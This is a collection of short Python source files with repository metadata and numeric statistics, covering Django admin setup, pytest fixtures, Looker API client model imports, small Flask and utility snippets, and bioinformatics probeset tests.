| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| false
| 0
| 0.052632
| 0.052632
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
78e4aa0b9ca6977d1dfaaf04a8cbaf7dce390645
| 87
|
py
|
Python
|
backend/server/apps/ml/income_classifier/__init__.py
|
goowei/ML_service
|
4cc761fdb7c8384939aea2b94a4ecbf8e7ffb260
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/income_classifier/__init__.py
|
goowei/ML_service
|
4cc761fdb7c8384939aea2b94a4ecbf8e7ffb260
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/income_classifier/__init__.py
|
goowei/ML_service
|
4cc761fdb7c8384939aea2b94a4ecbf8e7ffb260
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 11:04:19 2020
@author: William
"""
| 10.875
| 35
| 0.574713
| 14
| 87
| 3.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188406
| 0.206897
| 87
| 7
| 36
| 12.428571
| 0.536232
| 0.873563
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
78fe44e3574b1e3689fa0cbf32e95873e97dcd84
| 116
|
py
|
Python
|
lender_app/admin.py
|
danhuyle508/django_lender
|
741cf687948b2f292c8fe78cc343be868de34fa5
|
[
"MIT"
] | null | null | null |
lender_app/admin.py
|
danhuyle508/django_lender
|
741cf687948b2f292c8fe78cc343be868de34fa5
|
[
"MIT"
] | null | null | null |
lender_app/admin.py
|
danhuyle508/django_lender
|
741cf687948b2f292c8fe78cc343be868de34fa5
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Book
# Register your models here.
admin.site.register((Book, ))
| 29
| 32
| 0.784483
| 17
| 116
| 5.352941
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12069
| 116
| 4
| 33
| 29
| 0.892157
| 0.224138
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
78fed2d009c970de2dcbd9e1b7bc525a8988cf2f
| 701
|
py
|
Python
|
tests/integration/services/ticketing/conftest.py
|
GSH-LAN/byceps
|
ab8918634e90aaa8574bd1bb85627759cef122fe
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/services/ticketing/conftest.py
|
GSH-LAN/byceps
|
ab8918634e90aaa8574bd1bb85627759cef122fe
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/services/ticketing/conftest.py
|
GSH-LAN/byceps
|
ab8918634e90aaa8574bd1bb85627759cef122fe
|
[
"BSD-3-Clause"
] | null | null | null |
"""
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
import pytest
@pytest.fixture(scope='package')
def category(make_ticket_category, party):
return make_ticket_category(party.id, 'Premium')
@pytest.fixture(scope='package')
def another_category(make_ticket_category, party):
return make_ticket_category(party.id, 'Economy')
@pytest.fixture(scope='package')
def ticketing_admin(make_user):
return make_user('TicketingAdmin')
@pytest.fixture(scope='package')
def ticket_manager(make_user):
return make_user('TicketManager')
@pytest.fixture(scope='package')
def ticket_owner(make_user):
return make_user('TicketOwner')
| 21.90625
| 54
| 0.761769
| 89
| 701
| 5.797753
| 0.393258
| 0.093023
| 0.174419
| 0.242248
| 0.662791
| 0.372093
| 0.24031
| 0.24031
| 0.24031
| 0.24031
| 0
| 0.0128
| 0.108417
| 701
| 31
| 55
| 22.612903
| 0.8128
| 0.138374
| 0
| 0.3125
| 0
| 0
| 0.145973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3125
| false
| 0
| 0.0625
| 0.3125
| 0.6875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
600a69191d24b3f3ce88dc9990c47a150348185c
| 12,515
|
py
|
Python
|
lookerapi/models/__init__.py
|
jcarah/python_sdk
|
3bff34d04a828c940c3f93055e10b6a0095c2327
|
[
"MIT"
] | null | null | null |
lookerapi/models/__init__.py
|
jcarah/python_sdk
|
3bff34d04a828c940c3f93055e10b6a0095c2327
|
[
"MIT"
] | null | null | null |
lookerapi/models/__init__.py
|
jcarah/python_sdk
|
3bff34d04a828c940c3f93055e10b6a0095c2327
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Looker API 3.1 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. Note! With great power comes great responsibility: The \"Try It Out!\" button makes API calls to your live Looker instance. Be especially careful with destructive API operations such as `delete_user` or similar. There is no \"undo\" for API operations. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning (but we will try to avoid doing that). Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) This **API 3.1** is in active development. This is where support for new Looker features will appear as non-breaking additions - new functions, new optional parameters on existing functions, or new optional properties in existing types. Additive changes should not impact your existing application code that calls the Looker API. Your existing application code will not be aware of any new Looker API functionality until you choose to upgrade your app to use a newer Looker API client SDK release. The following are a few examples of noteworthy items that have changed between API 3.0 and API 3.1. For more comprehensive coverage of API changes, please see the release notes for your Looker release. ### Examples of new things added in API 3.1: * Dashboard construction APIs * Themes and custom color collections APIs * Create and run SQL_runner queries * Create and run merged results queries * Create and modify dashboard filters * Create and modify password requirements ### Deprecated in API 3.0 The following functions and properties have been deprecated in API 3.0. They continue to exist and work in API 3.0 for the next several Looker releases but they have not been carried forward to API 3.1: * Dashboard Prefetch functions * User access_filter functions * User API 1.0 credentials functions * Space.is_root and Space.is_user_root properties. Use Space.is_shared_root and Space.is_users_root instead. ### Semantic changes in API 3.1: * `all_looks` no longer includes soft-deleted looks, matching `all_dashboards` behavior. You can find soft-deleted looks using `search_looks` with the `deleted` param set to True. * `all_spaces` no longer includes duplicate items * `search_users` no longer accepts Y,y,1,0,N,n for Boolean params, only \"true\" and \"false\". * For greater client and network compatibility, `render_task_results` now returns HTTP status ***202 Accepted*** instead of HTTP status ***102 Processing*** * `all_running_queries` and `kill_query` functions have moved into the `Query` function group. If you have application code which relies on the old behavior of the APIs above, you may continue using the API 3.0 functions in this Looker release. We strongly suggest you update your code to use API 3.1 analogs as soon as possible.
OpenAPI spec version: 3.1.0
Contact: support@looker.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from .access_token import AccessToken
from .api_session import ApiSession
from .api_version import ApiVersion
from .api_version_element import ApiVersionElement
from .backup_configuration import BackupConfiguration
from .color_collection import ColorCollection
from .color_stop import ColorStop
from .content_favorite import ContentFavorite
from .content_meta import ContentMeta
from .content_meta_group_user import ContentMetaGroupUser
from .content_validation import ContentValidation
from .content_validation_dashboard import ContentValidationDashboard
from .content_validation_dashboard_element import ContentValidationDashboardElement
from .content_validation_dashboard_filter import ContentValidationDashboardFilter
from .content_validation_look import ContentValidationLook
from .content_validation_space import ContentValidationSpace
from .content_validator_error import ContentValidatorError
from .content_view import ContentView
from .continuous_palette import ContinuousPalette
from .create_dashboard_filter import CreateDashboardFilter
from .create_dashboard_render_task import CreateDashboardRenderTask
from .create_query_task import CreateQueryTask
from .credentials_api3 import CredentialsApi3
from .credentials_email import CredentialsEmail
from .credentials_embed import CredentialsEmbed
from .credentials_google import CredentialsGoogle
from .credentials_ldap import CredentialsLDAP
from .credentials_looker_openid import CredentialsLookerOpenid
from .credentials_oidc import CredentialsOIDC
from .credentials_saml import CredentialsSaml
from .credentials_totp import CredentialsTotp
from .db_connection import DBConnection
from .db_connection_base import DBConnectionBase
from .db_connection_override import DBConnectionOverride
from .db_connection_test_result import DBConnectionTestResult
from .dashboard import Dashboard
from .dashboard_base import DashboardBase
from .dashboard_element import DashboardElement
from .dashboard_filter import DashboardFilter
from .dashboard_layout import DashboardLayout
from .dashboard_layout_component import DashboardLayoutComponent
from .data_action_form import DataActionForm
from .data_action_form_field import DataActionFormField
from .data_action_form_select_option import DataActionFormSelectOption
from .data_action_request import DataActionRequest
from .data_action_response import DataActionResponse
from .data_action_user_state import DataActionUserState
from .datagroup import Datagroup
from .dialect import Dialect
from .dialect_info import DialectInfo
from .dialect_info_options import DialectInfoOptions
from .discrete_palette import DiscretePalette
from .error import Error
from .folder import Folder
from .git_branch import GitBranch
from .git_connection_test import GitConnectionTest
from .git_connection_test_result import GitConnectionTestResult
from .git_status import GitStatus
from .group import Group
from .group_id_for_group_inclusion import GroupIdForGroupInclusion
from .group_id_for_group_user_inclusion import GroupIdForGroupUserInclusion
from .homepage import Homepage
from .homepage_item import HomepageItem
from .homepage_section import HomepageSection
from .imported_project import ImportedProject
from .integration import Integration
from .integration_hub import IntegrationHub
from .integration_param import IntegrationParam
from .integration_required_field import IntegrationRequiredField
from .integration_test_result import IntegrationTestResult
from .internal_help_resources import InternalHelpResources
from .internal_help_resources_content import InternalHelpResourcesContent
from .ldap_config import LDAPConfig
from .ldap_config_test_issue import LDAPConfigTestIssue
from .ldap_config_test_result import LDAPConfigTestResult
from .ldap_group_read import LDAPGroupRead
from .ldap_group_write import LDAPGroupWrite
from .ldap_user import LDAPUser
from .ldap_user_attribute_read import LDAPUserAttributeRead
from .ldap_user_attribute_write import LDAPUserAttributeWrite
from .legacy_feature import LegacyFeature
from .locale import Locale
from .localization_settings import LocalizationSettings
from .look import Look
from .look_basic import LookBasic
from .look_model import LookModel
from .look_with_dashboards import LookWithDashboards
from .look_with_query import LookWithQuery
from .lookml_model import LookmlModel
from .lookml_model_explore import LookmlModelExplore
from .lookml_model_explore_access_filter import LookmlModelExploreAccessFilter
from .lookml_model_explore_alias import LookmlModelExploreAlias
from .lookml_model_explore_always_filter import LookmlModelExploreAlwaysFilter
from .lookml_model_explore_conditionally_filter import LookmlModelExploreConditionallyFilter
from .lookml_model_explore_error import LookmlModelExploreError
from .lookml_model_explore_field import LookmlModelExploreField
from .lookml_model_explore_field_enumeration import LookmlModelExploreFieldEnumeration
from .lookml_model_explore_field_map_layer import LookmlModelExploreFieldMapLayer
from .lookml_model_explore_field_sql_case import LookmlModelExploreFieldSqlCase
from .lookml_model_explore_field_time_interval import LookmlModelExploreFieldTimeInterval
from .lookml_model_explore_fieldset import LookmlModelExploreFieldset
from .lookml_model_explore_joins import LookmlModelExploreJoins
from .lookml_model_explore_set import LookmlModelExploreSet
from .lookml_model_explore_supported_measure_type import LookmlModelExploreSupportedMeasureType
from .lookml_model_nav_explore import LookmlModelNavExplore
from .manifest import Manifest
from .merge_fields import MergeFields
from .merge_query import MergeQuery
from .merge_query_source_query import MergeQuerySourceQuery
from .model_set import ModelSet
from .models_not_validated import ModelsNotValidated
from .oidc_config import OIDCConfig
from .oidc_group_read import OIDCGroupRead
from .oidc_group_write import OIDCGroupWrite
from .oidc_user_attribute_read import OIDCUserAttributeRead
from .oidc_user_attribute_write import OIDCUserAttributeWrite
from .password_config import PasswordConfig
from .permission import Permission
from .permission_set import PermissionSet
from .project import Project
from .project_error import ProjectError
from .project_file import ProjectFile
from .project_validation import ProjectValidation
from .project_validation_cache import ProjectValidationCache
from .project_workspace import ProjectWorkspace
from .query import Query
from .query_task import QueryTask
from .render_task import RenderTask
from .repository_credential import RepositoryCredential
from .result_maker_filterables import ResultMakerFilterables
from .result_maker_filterables_listen import ResultMakerFilterablesListen
from .result_maker_with_id_vis_config_and_dynamic_fields import ResultMakerWithIdVisConfigAndDynamicFields
from .role import Role
from .running_queries import RunningQueries
from .saml_config import SamlConfig
from .saml_group_read import SamlGroupRead
from .saml_group_write import SamlGroupWrite
from .saml_metadata_parse_result import SamlMetadataParseResult
from .saml_user_attribute_read import SamlUserAttributeRead
from .saml_user_attribute_write import SamlUserAttributeWrite
from .scheduled_plan import ScheduledPlan
from .scheduled_plan_destination import ScheduledPlanDestination
from .session import Session
from .session_config import SessionConfig
from .snippet import Snippet
from .space import Space
from .space_base import SpaceBase
from .sql_query import SqlQuery
from .sql_query_create import SqlQueryCreate
from .theme import Theme
from .theme_settings import ThemeSettings
from .timezone import Timezone
from .user import User
from .user_attribute import UserAttribute
from .user_attribute_group_value import UserAttributeGroupValue
from .user_attribute_with_value import UserAttributeWithValue
from .user_id_only import UserIdOnly
from .user_public import UserPublic
from .validation_error import ValidationError
from .validation_error_detail import ValidationErrorDetail
from .whitelabel_configuration import WhitelabelConfiguration
from .workspace import Workspace
| 69.916201
| 4,190
| 0.857851
| 1,642
| 12,515
| 6.35201
| 0.329476
| 0.016299
| 0.024449
| 0.03164
| 0.031927
| 0.012081
| 0
| 0
| 0
| 0
| 0
| 0.003942
| 0.10811
| 12,515
| 178
| 4,191
| 70.308989
| 0.930478
| 0.349181
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.006135
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
6022fde4b37a81b75c4803b33e1b6a0251c82491
| 123
|
py
|
Python
|
module2/__init__.py
|
LawAlias/gisflask
|
4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e
|
[
"Apache-2.0"
] | 17
|
2019-03-22T01:01:10.000Z
|
2022-03-03T09:56:51.000Z
|
module2/__init__.py
|
LawAlias/gisflask
|
4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e
|
[
"Apache-2.0"
] | null | null | null |
module2/__init__.py
|
LawAlias/gisflask
|
4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e
|
[
"Apache-2.0"
] | 12
|
2019-03-22T13:30:23.000Z
|
2020-05-15T05:36:17.000Z
|
#coding:utf-8
from flask import Flask
from main import app
app.config.from_pyfile('settings.py')
from module2 import views
| 20.5
| 37
| 0.804878
| 21
| 123
| 4.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018349
| 0.113821
| 123
| 5
| 38
| 24.6
| 0.880734
| 0.097561
| 0
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
603a2c6804547adbb8906c813d987d903da39c9c
| 160
|
py
|
Python
|
server/app.py
|
timmypotts/twitter
|
b9e28631cfd0cad867c9612ad597df0910a9fbff
|
[
"MIT"
] | null | null | null |
server/app.py
|
timmypotts/twitter
|
b9e28631cfd0cad867c9612ad597df0910a9fbff
|
[
"MIT"
] | null | null | null |
server/app.py
|
timmypotts/twitter
|
b9e28631cfd0cad867c9612ad597df0910a9fbff
|
[
"MIT"
] | null | null | null |
from flask import Flask, request, jsonify, make_response
import os
import sys
from dotenv import load_dotenv
app = Flask(__name__)
cors = CORS(app, resources=)
| 22.857143
| 56
| 0.79375
| 24
| 160
| 5.041667
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1375
| 160
| 7
| 57
| 22.857143
| 0.876812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.666667
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
604e76ede01ec446c97ad0e90967e2050b4174da
| 212
|
py
|
Python
|
winthingies/runtime.py
|
forensicmatt/PyWindowsThingies
|
000ff216c15ef9cd92924a692fce907ec829bc9d
|
[
"Apache-2.0"
] | 26
|
2019-01-22T07:05:58.000Z
|
2021-11-29T03:37:22.000Z
|
winthingies/runtime.py
|
vsajip/PyWindowsThingies
|
000ff216c15ef9cd92924a692fce907ec829bc9d
|
[
"Apache-2.0"
] | 1
|
2019-03-17T22:56:31.000Z
|
2019-03-20T02:47:00.000Z
|
winthingies/runtime.py
|
vsajip/PyWindowsThingies
|
000ff216c15ef9cd92924a692fce907ec829bc9d
|
[
"Apache-2.0"
] | 2
|
2020-03-16T14:30:49.000Z
|
2020-03-29T01:50:43.000Z
|
import os
from winthingies.process import Process
from winthingies.win32.kernel32 import kernel32
current_process = kernel32.GetCurrentProcess()
CURRENT_PROCESS = Process(
os.getpid(),
current_process
)
| 21.2
| 47
| 0.801887
| 24
| 212
| 6.958333
| 0.416667
| 0.251497
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0.132075
| 212
| 9
| 48
| 23.555556
| 0.86413
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.375
| 0
| 0.375
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
60a765e542e95ca6f3c4a457c66724b5c386d476
| 486
|
py
|
Python
|
slothql/utils/attr.py
|
karol-gruszczyk/sloth-gql
|
7972adb761b60f14409c2f734473c0a04b8db63c
|
[
"MIT"
] | 2
|
2018-01-07T08:51:27.000Z
|
2018-01-23T16:25:56.000Z
|
slothql/utils/attr.py
|
karol-gruszczyk/sloth-gql
|
7972adb761b60f14409c2f734473c0a04b8db63c
|
[
"MIT"
] | 3
|
2018-01-28T03:41:33.000Z
|
2018-01-28T03:55:00.000Z
|
slothql/utils/attr.py
|
karol-gruszczyk/slothql
|
7972adb761b60f14409c2f734473c0a04b8db63c
|
[
"MIT"
] | null | null | null |
import inspect
def is_magic_name(name: str) -> bool:
return name.startswith('__') and name.endswith('__')
def get_attrs(obj) -> dict:
return {name: getattr(obj, name) for name in dir(obj) if not is_magic_name(name)}
def get_attr_fields(obj) -> dict:
return {
name: getattr(obj, name) for name in dir(obj)
if not is_magic_name(name)
and not inspect.ismethod(getattr(obj, name))
and not inspect.isfunction(getattr(obj, name))
}
| 25.578947
| 85
| 0.652263
| 72
| 486
| 4.222222
| 0.361111
| 0.131579
| 0.184211
| 0.148026
| 0.434211
| 0.434211
| 0.434211
| 0.434211
| 0.434211
| 0.434211
| 0
| 0
| 0.228395
| 486
| 18
| 86
| 27
| 0.810667
| 0
| 0
| 0
| 0
| 0
| 0.00823
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.083333
| 0.25
| 0.583333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
715dd58ac511596c9a3d1af700b7871b543c875a
| 245
|
py
|
Python
|
PythonExercicios/ex019 - sorteo de item da lista.py
|
laaisfmaia/Exercicios-do-Curso-de-Python
|
bdaaf682db9f058d51d4dd084dab0e095f7e74c3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex019 - sorteo de item da lista.py
|
laaisfmaia/Exercicios-do-Curso-de-Python
|
bdaaf682db9f058d51d4dd084dab0e095f7e74c3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex019 - sorteo de item da lista.py
|
laaisfmaia/Exercicios-do-Curso-de-Python
|
bdaaf682db9f058d51d4dd084dab0e095f7e74c3
|
[
"MIT"
] | null | null | null |
import random
a1 = input('Nome do aluno 1: ')
a2 = input('Nome do aluno 2: ')
a3 = input('Nome do aluno 3: ')
a4 = input('Nome do aluno 4: ')
alunos = [a1,a2,a4,a3]
print('O aluno escolhido aleatoriamente foi {}'.format(random.choice(alunos)))
| 27.222222
| 78
| 0.665306
| 41
| 245
| 3.97561
| 0.536585
| 0.220859
| 0.269939
| 0.392638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058537
| 0.163265
| 245
| 8
| 79
| 30.625
| 0.736585
| 0
| 0
| 0
| 0
| 0
| 0.436735
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.142857
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
716897e98f2afc3cf45caa6e32cef4c098540792
| 75
|
py
|
Python
|
python/index.py
|
davidcsally/polyglot-hello-world
|
3940dfc27f3c5eb538e07220feee0b157a5cc998
|
[
"MIT"
] | null | null | null |
python/index.py
|
davidcsally/polyglot-hello-world
|
3940dfc27f3c5eb538e07220feee0b157a5cc998
|
[
"MIT"
] | null | null | null |
python/index.py
|
davidcsally/polyglot-hello-world
|
3940dfc27f3c5eb538e07220feee0b157a5cc998
|
[
"MIT"
] | null | null | null |
def say_hello(name="world"):
print("hello " + name + "!")
say_hello()
| 15
| 32
| 0.586667
| 10
| 75
| 4.2
| 0.6
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186667
| 75
| 4
| 33
| 18.75
| 0.688525
| 0
| 0
| 0
| 0
| 0
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
716be4f50e048983739386886dec8c4f4fd44890
| 172
|
py
|
Python
|
start.py
|
albertvisser/probreg
|
5f685616221e3261afe0d8ae8506cad9a719fa82
|
[
"MIT"
] | null | null | null |
start.py
|
albertvisser/probreg
|
5f685616221e3261afe0d8ae8506cad9a719fa82
|
[
"MIT"
] | null | null | null |
start.py
|
albertvisser/probreg
|
5f685616221e3261afe0d8ae8506cad9a719fa82
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
"""Startprogramma voor probreg gui versie
"""
import sys
from probreg.main import main
if len(sys.argv) > 1:
main(sys.argv[1])
else:
main()
| 17.2
| 41
| 0.680233
| 27
| 172
| 4.333333
| 0.666667
| 0.119658
| 0.136752
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021127
| 0.174419
| 172
| 9
| 42
| 19.111111
| 0.802817
| 0.354651
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
7194ea956252f214b9b7387cefdd32e16e25f906
| 1,590
|
py
|
Python
|
bcftbx/test/cli/test_annotate_probesets.py
|
fls-bioinformatics-core/genomics
|
1cd012faf69fff284f8f68ede050ffe30ac3327d
|
[
"AFL-3.0"
] | 49
|
2015-01-03T17:09:10.000Z
|
2022-03-17T19:28:08.000Z
|
bcftbx/test/cli/test_annotate_probesets.py
|
fls-bioinformatics-core/genomics
|
1cd012faf69fff284f8f68ede050ffe30ac3327d
|
[
"AFL-3.0"
] | 59
|
2015-04-16T14:21:04.000Z
|
2022-03-15T11:56:33.000Z
|
bcftbx/test/cli/test_annotate_probesets.py
|
fls-bioinformatics-core/genomics
|
1cd012faf69fff284f8f68ede050ffe30ac3327d
|
[
"AFL-3.0"
] | 29
|
2015-01-29T08:50:44.000Z
|
2021-08-19T02:15:44.000Z
|
#######################################################################
# Tests
#######################################################################
import unittest
from bcftbx.cli.annotate_probesets import get_probeset_extension
class TestProbesetAnnotation(unittest.TestCase):
def test_get_basic_probeset_extension(self):
"""Check that the correct probeset extensions are identified
"""
self.assertEqual(get_probeset_extension('123356_at'),'_at')
self.assertEqual(get_probeset_extension('123356_st'),'_st')
self.assertEqual(get_probeset_extension('123356_s_at'),'_s_at')
self.assertEqual(get_probeset_extension('123356_a_at'),'_a_at')
self.assertEqual(get_probeset_extension('123356_x_at'),'_x_at')
self.assertEqual(get_probeset_extension('123356_g_at'),'_g_at')
self.assertEqual(get_probeset_extension('123356_f_at'),'_f_at')
self.assertEqual(get_probeset_extension('123356_i_at'),'_i_at')
self.assertEqual(get_probeset_extension('123356_b_at'),'_b_at')
self.assertEqual(get_probeset_extension('123356_l_at'),'_l_at')
self.assertEqual(get_probeset_extension('123356'),None)
def test_get_tricky_probeset_extension(self):
"""Check the correct extensions are identified in tricker cases
"""
self.assertEqual(get_probeset_extension('123356b_at'),'_at')
def test_get_probeset_extension_r(self):
"""Check that the _r_ component overrules other extensions
"""
self.assertEqual(get_probeset_extension('123356_r_at'),'_r_')
| 46.764706
| 71
| 0.665409
| 182
| 1,590
| 5.346154
| 0.258242
| 0.29702
| 0.308325
| 0.347379
| 0.560123
| 0.524152
| 0.397739
| 0
| 0
| 0
| 0
| 0.057269
| 0.143396
| 1,590
| 33
| 72
| 48.181818
| 0.657122
| 0.130818
| 0
| 0
| 0
| 0
| 0.151144
| 0
| 0
| 0
| 0
| 0
| 0.684211
| 1
| 0.157895
| false
| 0
| 0.105263
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
719b05018ec53f21f5b2fc74db39c9aad85a1eee
| 3,322
|
py
|
Python
|
lib/sqlalchemy/types.py
|
Dreamsorcerer/sqlalchemy
|
153671df9d4cd7f2cdb3e14e6221f529269885d9
|
[
"MIT"
] | 6
|
2019-02-18T12:42:44.000Z
|
2020-11-11T23:10:17.000Z
|
lib/sqlalchemy/types.py
|
Dreamsorcerer/sqlalchemy
|
153671df9d4cd7f2cdb3e14e6221f529269885d9
|
[
"MIT"
] | 1
|
2020-07-20T13:23:44.000Z
|
2020-07-20T13:23:44.000Z
|
lib/sqlalchemy/types.py
|
Dreamsorcerer/sqlalchemy
|
153671df9d4cd7f2cdb3e14e6221f529269885d9
|
[
"MIT"
] | 2
|
2021-06-12T01:38:00.000Z
|
2021-09-05T21:18:29.000Z
|
# types.py
